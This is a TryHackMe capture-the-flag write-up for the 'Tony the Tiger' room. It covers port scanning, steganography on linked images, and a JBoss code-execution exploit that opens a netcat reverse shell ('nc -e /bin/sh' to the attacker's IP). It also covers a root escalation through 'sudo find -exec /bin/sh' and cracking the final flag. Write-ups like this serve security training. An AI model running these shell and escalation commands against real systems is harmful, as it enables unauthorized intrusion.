Hello. I’m Rahmos. Here is my Tony the Tiger — TryHackMe — WriteUp. Check it out!
I’m going right into task 3. Cause you can answer all the questions of task 2 by reading.
First, deploy the machine and scan for opened ports using nmap.
nmap -A -T4 -v -p- <ip>
nmap -A -sV -p8080 <ip> to scan for service running on port 8080
So copy the “VERSION’’ and it’s your first ans. And for the 2nd question, it’s “JBOSS”.
First, let’s access the website at port 80. It’s where Tony talking about “cereal”.
Look closely at his first post:
Photos that have a deeper meaning means Steganography! Download his avatar and find hidden data.
Here is the link of his avatar: https://i.imgur.com/ATbbYpN.jpg
I’m gonna use wget to get this image.
I’ve used strings to find out what is hidden, but it seems I’m inspecting the wrong image.
Get back to the web and click on his other post: Frosted Flakes. You will see another image. Again, download this image and find hidden data.
Here is the link: https://i.imgur.com/be2sOV9.jpg
Here you’ll get the 1st flag.
Because the web app is vulnerable to code execution, so we will spawn a reverse shell.
First, start a listener on your machine:
nc -lvnp 4444
Download the exploit code from THM, and exec like this command:
python3 exploit.py <ip>:8080 “nc -e /bin/sh <your-vpn-ip> 4444”
When it’s successful, you will have the shell.
In order to get a stable shell, and also can su to another user, spawn a tty shell using python:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
The question is JBOSS’s flag, so let’s cd to /home/jboss to look around
There is a “note” file inside jboss’s home folder. Read its content.
Now we know Jboss’s password. Let’s su to him
List content and cat jboss’s flag
Now I’ll find a way to get root!
First, sudo -l to see if jboss can run command as root:
So, jboss can run “find” as root without password needed.
find can execute another command with flag -exec, so let’s spawn a root shell using this command:
sudo find . -exec /bin/sh \; -quit
*Remember the \; at the end, because it indicates the end of the statement to execute.
Now I’m root! Get our final flag in /root/root.txt
It’s encoded with Base64 and hashed with MD5. So firtst, decode the string from base64, then crack with md5 hash.
Then copy the decoded string to https://crackstation.net/ to crack.